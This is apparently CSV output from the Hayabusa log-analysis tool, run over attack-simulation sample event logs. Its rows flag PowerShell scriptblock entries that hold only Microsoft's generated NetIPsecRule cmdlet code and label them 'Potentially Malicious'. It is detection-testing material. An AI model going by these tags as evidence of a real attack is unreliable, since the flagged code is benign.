[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] 
${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 
${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
